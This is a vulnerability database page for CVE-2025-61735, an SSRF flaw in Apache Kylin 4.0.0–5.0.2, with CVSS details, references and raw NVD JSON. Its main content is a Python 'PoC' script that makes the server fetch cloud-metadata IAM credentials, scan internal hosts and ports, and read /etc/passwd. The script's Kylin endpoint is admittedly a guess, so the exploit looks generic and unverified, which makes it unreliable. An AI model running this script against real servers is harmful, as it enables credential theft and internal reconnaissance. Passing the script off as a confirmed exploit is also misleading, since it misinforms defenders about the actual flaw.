CVE-2025-61735

Description

Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. You are fine as long as the Kylin's system and project admin access is well protected. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - VULNERABLE

Apache Kylin >= 4.0.0

Apache Kylin <= 5.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61735 - Apache Kylin SSRF PoC
# This PoC demonstrates the SSRF vulnerability in Apache Kylin (4.0.0 - 5.0.2)
# The vulnerability allows attackers to make the server send requests to arbitrary URLs.

import requests

# Target Apache Kylin server
TARGET_URL = "http://target-kylin-host:7070"

# Step 1: Attempt to access internal metadata service (e.g., cloud metadata)
# This can be used to extract sensitive cloud credentials
def exploit_ssrf_cloud_metadata(target_url):
    """
    Exploit SSRF to access cloud metadata service.
    Example targets:
      - AWS:   http://169.254.169.254/latest/meta-data/
      - GCP:   http://metadata.google.internal/computeMetadata/v1/
      - Azure: http://169.254.169.254/metadata/instance
    """
    malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    payload = {
        "url": malicious_url,
        "method": "GET"
    }
    # Adjust endpoint based on the specific vulnerable Kylin API
    response = requests.post(
        f"{target_url}/kylin/api/diag/project/download",
        json=payload,
        headers={"Content-Type": "application/json"}
    )
    print(f"[+] Cloud Metadata Response: {response.text}")
    return response.text


# Step 2: Internal network port scanning via SSRF
def exploit_ssrf_port_scan(target_url):
    """
    Use SSRF to scan internal network ports.
    """
    internal_targets = [
        "http://127.0.0.1:7070",          # Kylin itself
        "http://127.0.0.1:8080",          # Common internal service
        "http://192.168.1.1",             # Internal gateway
        "http://10.0.0.1",                # Internal network
        "http://localhost:22",            # SSH service detection
    ]
    for internal_url in internal_targets:
        payload = {"url": internal_url}
        response = requests.post(
            f"{target_url}/kylin/api/diag/project/download",
            json=payload,
            headers={"Content-Type": "application/json"}
        )
        print(f"[+] Probing {internal_url} -> Status: {response.status_code}")


# Step 3: Read local files via file:// protocol
def exploit_ssrf_file_read(target_url):
    """
    Attempt to read local files using file:// protocol.
    """
    payload = {"url": "file:///etc/passwd"}
    response = requests.post(
        f"{target_url}/kylin/api/diag/project/download",
        json=payload,
        headers={"Content-Type": "application/json"}
    )
    print(f"[+] File Read Response: {response.text}")


if __name__ == "__main__":
    print(f"[*] Targeting Apache Kylin at: {TARGET_URL}")
    print("[*] Attempting SSRF exploitation...")
    exploit_ssrf_cloud_metadata(TARGET_URL)
    exploit_ssrf_port_scan(TARGET_URL)
    exploit_ssrf_file_read(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61735
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61735
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61735/
[4] VulDB https://vuldb.com/cve/CVE-2025-61735
[5] https://lists.apache.org/thread/yscobmx869zvprsykb94r24jtmb58ckh
[6] http://www.openwall.com/lists/oss-security/2025/09/30/9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61735", "sourceIdentifier": "[email protected]", "published": "2025-10-02T10:15:40.250", "lastModified": "2025-11-04T22:16:37.160", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin.\n\nThis issue affects Apache Kylin: from 4.0.0 through 5.0.2. You are fine as long as the Kylin's system and project admin access is well protected.\n\nUsers are recommended to upgrade to version 5.0.3, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "0732C89B-68F0-406A-977F-C75F554B17DD"}]}]}], "references": [{"url": "https://lists.apache.org/thread/yscobmx869zvprsykb94r24jtmb58ckh", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/09/30/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}